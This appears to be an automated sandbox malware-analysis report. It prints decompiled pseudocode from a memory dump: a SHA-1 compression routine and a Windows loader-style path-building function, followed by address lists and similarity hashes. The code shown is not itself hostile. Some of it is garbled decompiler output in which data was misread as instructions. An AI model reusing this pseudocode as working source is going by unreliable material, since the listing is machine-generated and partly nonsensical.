					asm("ror ecx, 0x2");
					_v8 = _t364;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t326;
					_t502 = _t285 + ( !_t416 & _t326 | _t364 & _t416) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t360 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t416;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t505 = _t502 + ( !_t360 & _t288 | _t416 & _t360) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t407 = _v8;
					asm("ror ecx, 0x2");
					_t467 = _t466 + 5;
					_t321 = _t505;
					_v12 = _t321;
					_v8 = _t467;
				} while (_t467 < 0x14);
				_t468 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t407;
					_t508 = _t505 + (_t407 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t335 = _v12;
					_v12 = _t508;
					asm("rol esi, 0x5");
					_t423 = _t508 + (_t360 ^ _t279 ^ _t335) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t511 = _t279;
					_v16 = _t360;
					_t367 = _v12;
					_v12 = _t423;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t423 + (_t279 ^ _t335 ^ _t367) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t426 = _v12;
					_v8 = _t335;
					_v8 = _t367;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t468 = _t468 + 5;
					_t360 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t511 + 0x6ed9eba1; // 0x6ed9eb9f
					_t512 = _t292 + (_t335 ^ _v8 ^ _t426) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t426;
					_v12 = _t512;
					asm("rol esi, 0x5");
					_t407 = _v8;
					_t505 = _t512 + (_t295 ^ _v8 ^ _t360) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x150)) + _t335 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
				} while (_t468 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t407;
					asm("ror eax, 0x2");
					_t516 = ((_t360 | _t279) & _t407 | _t360 & _t279) +  *((intOrPtr*)(_t544 + _v8 * 4 - 0x14c)) + _t505 + _v16 - 0x70e44324;
					_t474 = _v12;
					_v12 = _t516;
					asm("rol esi, 0x5");
					_t341 = _v8;
					asm("ror edi, 0x2");
					_t435 = ((_t279 | _t474) & _t360 | _t279 & _t474) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x148)) + _t516 + _v16 - 0x70e44324;
					_v16 = _t360;
					_t371 = _v12;
					_v12 = _t435;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t437 = ((_t474 | _t371) & _t279 | _t474 & _t371) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x144)) + _t435 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t474;
					_v12 = _t437;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t528 = ((_t371 | _t299) & _t474 | _t371 & _t299) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x140)) + _t437 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t440 = _t371;
					_t360 = _v12;
					_v8 = _t440;
					_v12 = _t528;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t505 = ((_t299 | _t360) & _t440 | _t299 & _t360) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x13c)) + _t528 + _v16 - 0x70e44324;
					_t407 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
					_t342 = _t341 + 5;
					_v8 = _t342;
				} while (_t342 < 0x3c);
				_t482 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t483 = _v8;
					asm("ror eax, 0x2");
					_t531 = (_t407 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t544 + _t482 * 4 - 0x14c)) + _t505 + _v16 - 0x359d3e2a;
					_t347 = _v12;
					_v16 = _t407;
					_v12 = _t531;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t448 = (_t360 ^ _t279 ^ _t347) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x148)) + _t531 + _v16 - 0x359d3e2a;
					_v16 = _t360;
					_t372 = _v12;
					_v12 = _t448;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t347 ^ _t372) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x144)) + _t448 + _v16 - 0x359d3e2a;
					_t407 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t347;
					_t538 = (_t347 ^ _t372 ^ _t407) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t372;
					_v8 = _t347;
					asm("ror edx, 0x2");
					_v8 = _t372;
					_t360 = _v12;
					_v12 = _t538;
					asm("rol esi, 0x5");
					_t482 = _t483 + 5;
					_t505 = (_t305 ^ _t407 ^ _t360) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x13c)) + _t538 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t407;
					_v12 = _t505;
					_v8 = _t482;
				} while (_t482 < 0x50);
				_t484 = _a4;
				_t484[2] = _t484[2] + _t360;
				_t484[3] = _t484[3] + _t407;
				_t311 = _t484[4] + _v16;
				 *_t484 =  *_t484 + _t505;
				_t484[1] = _t484[1] + _t279;
				_t484[4] = _t311;
				_t484[0x17] = 0;
				return _t311;
			}

0x00409e41
0x00409e4b
0x00409e4f
0x00409e51
0x00409e51
0x00409e54
0x00409e76
0x00409e9c
0x00409ec2
0x00409ee4
0x00409eeb
0x00409eee
0x00409ef1
0x00409efa
0x00409f00
0x00409f07
0x00409f18
0x00409f1b
0x00409f1e
0x00409f22
0x00409f24
0x00409f26
0x00409f2f
0x00409f32
0x00409f35
0x00409f40
0x00409f46
0x00409f48
0x00409f48
0x00409f4b
0x00409f4e
0x00409f4e
0x00409f53
0x00409f55
0x00409f58
0x00409f5b
0x00409f61
0x00409f64
0x00409f67
0x00409f70
0x00409f76
0x00409f7f
0x00409f8e
0x00409f95
0x00409f98
0x00409f9b
0x00409fa4
0x00409fa7
0x00409faa
0x00409fc2
0x00409fc9
0x00409fcb
0x00409fce
0x00409fd1
0x00409fda
0x00409fe1
0x00409fe4
0x00409fe7
0x00409ff6
0x00409ffd
0x0040a000
0x0040a003
0x0040a00c
0x0040a016
0x0040a019
0x0040a025
0x0040a028
0x0040a02f
0x0040a032
0x0040a035
0x0040a03a
0x0040a03d
0x0040a046
0x0040a057
0x0040a05a
0x0040a05d
0x0040a064
0x0040a067
0x0040a06a
0x0040a06d
0x0040a06f
0x0040a072
0x0040a075
0x0040a07e
0x0040a083
0x0040a083
0x0040a098
0x0040a09b
0x0040a09e
0x0040a0a5
0x0040a0a8
0x0040a0ab
0x0040a0c0
0x0040a0c7
0x0040a0ca
0x0040a0ce
0x0040a0d1
0x0040a0d6
0x0040a0d9
0x0040a0e8
0x0040a0eb
0x0040a0f2
0x0040a0f5
0x0040a0f8
0x0040a0fb
0x0040a0fe
0x0040a106
0x0040a114
0x0040a117
0x0040a11a
0x0040a11a
0x0040a121
0x0040a124
0x0040a127
0x0040a12f
0x0040a13d
0x0040a140
0x0040a147
0x0040a14a
0x0040a14d
0x0040a150
0x0040a153
0x0040a15c
0x0040a163
0x0040a163
0x0040a169
0x0040a182
0x0040a185
0x0040a18c
0x0040a18f
0x0040a192
0x0040a1a4
0x0040a1ae
0x0040a1b1
0x0040a1ba
0x0040a1bd
0x0040a1c4
0x0040a1c7
0x0040a1cd
0x0040a1e0
0x0040a1e7
0x0040a1ea
0x0040a1ed
0x0040a1f0
0x0040a1f9
0x0040a1fc
0x0040a20f
0x0040a212
0x0040a21c
0x0040a21f
0x0040a221
0x0040a22a
0x0040a22d
0x0040a240
0x0040a246
0x0040a249
0x0040a250
0x0040a252
0x0040a255
0x0040a258
0x0040a25b
0x0040a25e
0x0040a261
0x0040a26a
0x0040a26f
0x0040a272
0x0040a272
0x0040a285
0x0040a288
0x0040a28b
0x0040a292
0x0040a295
0x0040a298
0x0040a29b
0x0040a2ae
0x0040a2b1
0x0040a2bc
0x0040a2bf
0x0040a2cb
0x0040a2ce
0x0040a2d4
0x0040a2d7
0x0040a2da
0x0040a2e1
0x0040a2f1
0x0040a2f4
0x0040a2fa
0x0040a2fd
0x0040a304
0x0040a306
0x0040a309
0x0040a30c
0x0040a30f
0x0040a312
0x0040a319
0x0040a328
0x0040a32b
0x0040a332
0x0040a335
0x0040a338
0x0040a33b
0x0040a33e
0x0040a341
0x0040a344
0x0040a34d
0x0040a35e
0x0040a366
0x0040a36c
0x0040a36f
0x0040a371
0x0040a374
0x0040a377
0x0040a384

Strings

(, xrefs: 0040A15C

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 754b117fd892a9b0e1bade77939fa274bb074636fbee3080eeaa26fbe0c81337
Instruction ID: c4681cb07c76cf112b13eac6a44ff3137b1ee411e965e90703be59ce7b492135
Opcode Fuzzy Hash: 754b117fd892a9b0e1bade77939fa274bb074636fbee3080eeaa26fbe0c81337
Instruction Fuzzy Hash: 34021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 01442581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E01442581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200384, char _a1546912064) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t253;
				signed int _t257;
				void* _t258;
				void* _t259;
				void* _t260;
				signed int _t266;
				signed int _t268;
				intOrPtr _t270;
				signed int _t273;
				signed int _t280;
				signed int _t283;
				signed int _t291;
				intOrPtr _t297;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t304;
				unsigned int _t307;
				signed int _t311;
				void* _t312;
				signed int _t313;
				signed int _t317;
				intOrPtr _t329;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				void* _t353;
				void* _t355;
				void* _t356;
				void* _t362;

				_t350 = _t352;
				_t353 = _t352 - 0x4c;
				_v8 =  *0x150d360 ^ _t350;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t345 = 0x150b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t307 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t297 = 0x48;
				_t327 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t338 = 0;
				_v37 = _t327;
				if(_v48 <= 0) {
					L16:
					_t45 = _t297 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t346 = 0xc0000106;
						goto L32;
					} else {
						_t345 = L01434620(_t307,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t297);
						_v52 = _t345;
						__eflags = _t345;
						if(_t345 == 0) {
							_t346 = 0xc0000017;
							goto L32;
						} else {
							 *(_t345 + 0x44) =  *(_t345 + 0x44) & 0x00000000;
							_t50 = _t345 + 0x48; // 0x48
							_t340 = _t50;
							_t327 = _v32;
							 *((intOrPtr*)(_t345 + 0x3c)) = _t297;
							_t299 = 0;
							 *((short*)(_t345 + 0x30)) = _v48;
							__eflags = _t327;
							if(_t327 != 0) {
								 *(_t345 + 0x18) = _t340;
								__eflags = _t327 - 0x1508478;
								 *_t345 = ((0 | _t327 == 0x01508478) - 0x00000001 & 0xfffffffb) + 7;
								E0145F3E0(_t340,  *((intOrPtr*)(_t327 + 4)),  *_t327 & 0x0000ffff);
								_t327 = _v32;
								_t353 = _t353 + 0xc;
								_t299 = 1;
								__eflags = _a8;
								_t340 = _t340 + (( *_t327 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t291 = E014A39F2(_t340);
									_t327 = _v32;
									_t340 = _t291;
								}
							}
							_t311 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t346 = _v68;
								__eflags = 0;
								 *((short*)(_t340 - 2)) = 0;
								goto L32;
							} else {
								_t301 = _t345 + _t299 * 4;
								_v56 = _t301;
								do {
									__eflags = _t327;
									if(_t327 != 0) {
										_t253 =  *(_v60 + _t311 * 4);
										__eflags = _t253;
										if(_t253 == 0) {
											goto L30;
										} else {
											__eflags = _t253 == 5;
											if(_t253 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t301 =  *(_v60 + _t311 * 4);
										 *(_t301 + 0x18) = _t340;
										_t257 =  *(_v60 + _t311 * 4);
										__eflags = _t257 - 8;
										if(_t257 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t257 * 4 +  &M01442959))) {
												case 0:
													__ax =  *0x1508488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0145F3E0(__edi,  *0x150848c, __ax & 0x0000ffff);
														__eax =  *0x1508488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0145F3E0(_t340, _v80, _v64);
													_t286 = _v64;
													goto L26;
												case 2:
													 *0x1508480 & 0x0000ffff = E0145F3E0(__edi,  *0x1508484,  *0x1508480 & 0x0000ffff);
													__eax =  *0x1508480 & 0x0000ffff;
													__eax = ( *0x1508480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0145F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0145F3E0(_t340, _v76, _v36);
														_t286 = _v36;
													}
													L26:
													_t353 = _t353 + 0xc;
													_t340 = _t340 + (_t286 >> 1) * 2 + 2;
													__eflags = _t340;
													L27:
													_push(0x3b);
													_pop(_t288);
													 *((short*)(_t340 - 2)) = _t288;
													goto L28;
												case 6:
													__ebx = "\\W;w\\W;w";
													__eflags = __ebx - "\\W;w\\W;w";
													if(__ebx != "\\W;w\\W;w") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0145F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\W;w\\W;w";
														} while (__ebx != "\\W;w\\W;w");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1508478 & 0x0000ffff = E0145F3E0(__edi,  *0x150847c,  *0x1508478 & 0x0000ffff);
													__eax =  *0x1508478 & 0x0000ffff;
													__eax = ( *0x1508478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E014A39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1506e58 & 0x0000ffff = E0145F3E0(__edi,  *0x1506e5c,  *0x1506e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1506e58 & 0x0000ffff;
													__eax = ( *0x1506e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t311 = _v16;
													_t327 = _v32;
													L29:
													_t301 = _t301 + 4;
													__eflags = _t301;
													_v56 = _t301;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t311 = _t311 + 1;
									_v16 = _t311;
									__eflags = _t311 - _v48;
								} while (_t311 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t257 =  *(_v60 + _t338 * 4);
						if(_t257 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t257 * 4 +  &M01442935))) {
							case 0:
								__ax =  *0x1508488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t327 =  &_v64;
								_v80 = E01442E3E(0,  &_v64);
								_t297 = _t297 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1508480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1508480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0142EEF0(0x15079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0142EB70(__ecx, 0x15079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t231 = _v72;
											__eflags = _t231;
											if(_t231 != 0) {
												L014377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t231);
											}
											_t232 = _v52;
											__eflags = _t232;
											if(_t232 != 0) {
												__eflags = _t346;
												if(_t346 < 0) {
													L014377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t232);
													_t232 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t307 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1507b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01434620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0142EB70(__ecx, 0x15079a0);
										__eax = _v52;
										L36:
										_pop(_t339);
										_pop(_t347);
										__eflags = _v8 ^ _t350;
										_pop(_t298);
										return E0145B640(_t232, _t298, _v8 ^ _t350, _t327, _t339, _t347);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t293 = _v56;
								if(_v56 != 0) {
									_t327 =  &_v36;
									_t295 = E01442E3E(_t293,  &_v36);
									_t307 = _v36;
									_v76 = _t295;
								}
								if(_t307 == 0) {
									goto L44;
								} else {
									_t297 = _t297 + 2 + _t307;
								}
								goto L14;
							case 6:
								__eax =  *0x1505764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1508478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1508478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1506e58 & 0x0000ffff;
								__eax = ( *0x1506e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t338 = _t338 + 1;
								if(_t338 >= _v48) {
									goto L16;
								} else {
									_t327 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t312 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					_t355 = _t353 + 1;
					 *((intOrPtr*)(_t345 + 0x28)) =  *((intOrPtr*)(_t345 + 0x28)) + _t355;
					_t356 = _t355 + 1;
					_t258 = _t257 + _t356;
					asm("daa");
					 *_t345 =  *_t345 + _t350;
					 *((intOrPtr*)(_t345 + 0x28)) =  *((intOrPtr*)(_t345 + 0x28)) + _t258;
					 *0x1f014426 =  *0x1f014426 + _t258;
					_pop(_t302);
					_t259 = _t258 - 1;
					 *((intOrPtr*)(_t259 +  &_a1530200384)) =  *((intOrPtr*)(_t259 +  &_a1530200384)) + _t327;
					_t260 = _t259 - 1;
					 *_t327 =  *_t327 + _t260;
					 *((intOrPtr*)(_t312 + _t260 - 0x80)) =  *((intOrPtr*)(_t312 + _t260 - 0x80)) - _t260;
					 *((intOrPtr*)(_t312 + _t260 - 0xa)) =  *((intOrPtr*)(_t312 + _t260 - 0xa)) - _t260;
					asm("daa");
					 *_t345 =  *_t345 + _t302;
					 *((intOrPtr*)(_t312 + _t260 + 0x4e)) =  *((intOrPtr*)(_t312 + _t260 + 0x4e)) - _t260;
					 *((intOrPtr*)(_t312 + _t260 + 0x5d)) =  *((intOrPtr*)(_t312 + _t260 + 0x5d)) - _t260;
					asm("daa");
					_pop(_t303);
					 *((intOrPtr*)(_t260 + _t302 - 1 +  &_a1546912064)) =  *((intOrPtr*)(_t260 + _t302 - 1 +  &_a1546912064)) + _t345;
					_t362 = _t356 + 5 + _t312;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x14eff00);
					E0146D08C(_t303, _t340, _t345);
					_v44 =  *[fs:0x18];
					_t341 = 0;
					 *_a24 = 0;
					_t304 = _a12;
					__eflags = _t304;
					if(_t304 == 0) {
						_t266 = 0xc0000100;
					} else {
						_v8 = 0;
						_t348 = 0xc0000100;
						_v52 = 0xc0000100;
						_t268 = 4;
						while(1) {
							_v40 = _t268;
							__eflags = _t268;
							if(_t268 == 0) {
								break;
							}
							_t317 = _t268 * 0xc;
							_v48 = _t317;
							__eflags = _t304 -  *((intOrPtr*)(_t317 + 0x13f1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t283 = E0145E5C0(_a8,  *((intOrPtr*)(_t317 + 0x13f1668)), _t304);
									_t362 = _t362 + 0xc;
									__eflags = _t283;
									if(__eflags == 0) {
										_t348 = E014951BE(_t304,  *((intOrPtr*)(_v48 + 0x13f166c)), _a16, _t341, _t348, __eflags, _a20, _a24);
										_v52 = _t348;
										break;
									} else {
										_t268 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t268 = _t268 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t348;
						__eflags = _t348;
						if(_t348 < 0) {
							__eflags = _t348 - 0xc0000100;
							if(_t348 == 0xc0000100) {
								_t313 = _a4;
								__eflags = _t313;
								if(_t313 != 0) {
									_v36 = _t313;
									__eflags =  *_t313 - _t341;
									if( *_t313 == _t341) {
										_t348 = 0xc0000100;
										goto L76;
									} else {
										_t329 =  *((intOrPtr*)(_v44 + 0x30));
										_t270 =  *((intOrPtr*)(_t329 + 0x10));
										__eflags =  *((intOrPtr*)(_t270 + 0x48)) - _t313;
										if( *((intOrPtr*)(_t270 + 0x48)) == _t313) {
											__eflags =  *(_t329 + 0x1c);
											if( *(_t329 + 0x1c) == 0) {
												L106:
												_t348 = E01442AE4( &_v36, _a8, _t304, _a16, _a20, _a24);
												_v32 = _t348;
												__eflags = _t348 - 0xc0000100;
												if(_t348 != 0xc0000100) {
													goto L69;
												} else {
													_t341 = 1;
													_t313 = _v36;
													goto L75;
												}
											} else {
												_t273 = E01426600( *(_t329 + 0x1c));
												__eflags = _t273;
												if(_t273 != 0) {
													goto L106;
												} else {
													_t313 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t348 = E01442C50(_t313, _a8, _t304, _a16, _a20, _a24, _t341);
											L76:
											_v32 = _t348;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0142EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t348 = _a24;
									_t280 = E01442AE4( &_v36, _a8, _t304, _a16, _a20, _t348);
									_v32 = _t280;
									__eflags = _t280 - 0xc0000100;
									if(_t280 == 0xc0000100) {
										_v32 = E01442C50(_v36, _a8, _t304, _a16, _a20, _t348, 1);
									}
									_v8 = _t341;
									E01442ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t266 = _t348;
					}
					L70:
					return E0146D0D1(_t266);
				}
				L108:
			}

0x01442584
0x01442586
0x01442590
0x01442596
0x01442597
0x01442598
0x01442599
0x0144259e
0x014425a4
0x014425a9
0x014425ac
0x014425ae
0x014425b1
0x014425b2
0x014425b5
0x014425b8
0x014425bb
0x014425bc
0x014425bf
0x014425c2
0x014425c5
0x014425c6
0x014425cb
0x014425ce
0x014425d8
0x014425dd
0x014425de
0x014425e1
0x014425e3
0x014425e9
0x014426da
0x014426da
0x014426dd
0x014426e2
0x01485b56
0x00000000
0x014426e8
0x014426f9
0x014426fb
0x014426fe
0x01442700
0x01485b60
0x00000000
0x01442706
0x01442706
0x0144270a
0x0144270a
0x0144270d
0x01442713
0x01442716
0x01442718
0x0144271c
0x0144271e
0x01485b6c
0x01485b6f
0x01485b7f
0x01485b89
0x01485b8e
0x01485b93
0x01485b96
0x01485b9c
0x01485ba0
0x01485ba3
0x01485bab
0x01485bb0
0x01485bb3
0x01485bb3
0x01485ba3
0x01442724
0x01442726
0x01442729
0x0144272c
0x0144279d
0x0144279d
0x014427a0
0x014427a2
0x00000000
0x0144272e
0x0144272e
0x01442731
0x01442734
0x01442734
0x01442736
0x01485bc1
0x01485bc1
0x01485bc4
0x00000000
0x01485bca
0x01485bca
0x01485bcd
0x00000000
0x01485bd3
0x00000000
0x01485bd3
0x01485bcd
0x0144273c
0x0144273c
0x01442742
0x01442747
0x0144274a
0x0144274d
0x01442750
0x00000000
0x01442756
0x01442756
0x00000000
0x01442902
0x01442908
0x0144290b
0x00000000
0x01442911
0x0144291c
0x01442921
0x00000000
0x01442921
0x00000000
0x00000000
0x01442880
0x01442887
0x0144288c
0x00000000
0x00000000
0x01442805
0x0144280a
0x01442814
0x01442816
0x00000000
0x00000000
0x0144281e
0x01442821
0x01442823
0x00000000
0x01442829
0x01442829
0x01442831
0x0144283c
0x0144283e
0x00000000
0x0144283e
0x00000000
0x00000000
0x0144284e
0x01442850
0x01442851
0x01442854
0x01442857
0x0144285a
0x0144285c
0x0144285d
0x00000000
0x00000000
0x0144275d
0x01442761
0x00000000
0x01442767
0x0144276e
0x01442773
0x01442773
0x01442776
0x01442778
0x0144277e
0x0144277e
0x01442781
0x01442781
0x01442783
0x01442784
0x00000000
0x00000000
0x01485bd8
0x01485bde
0x01485be4
0x01485be6
0x01485be8
0x01485be9
0x01485bee
0x01485bf8
0x01485bff
0x01485c01
0x01485c04
0x01485c07
0x01485c0b
0x01485c0d
0x01485c0d
0x01485c15
0x01485c18
0x01485c1b
0x01485c1b
0x01485c1e
0x00000000
0x00000000
0x014428c3
0x014428c8
0x014428d2
0x014428d4
0x014428d8
0x014428db
0x01485c26
0x01485c28
0x01485c2d
0x01485c2d
0x00000000
0x00000000
0x01485c34
0x01485c36
0x01485c49
0x01485c4e
0x01485c54
0x01485c5b
0x01485c5d
0x01485c60
0x01442788
0x01442788
0x0144278b
0x0144278e
0x0144278e
0x0144278e
0x01442791
0x00000000
0x00000000
0x01442756
0x01442750
0x00000000
0x01442794
0x01442794
0x01442795
0x01442798
0x01442798
0x00000000
0x01442734
0x0144272c
0x01442700
0x014425ef
0x014425ef
0x014425ef
0x014425f2
0x014425f8
0x00000000
0x00000000
0x014425fe
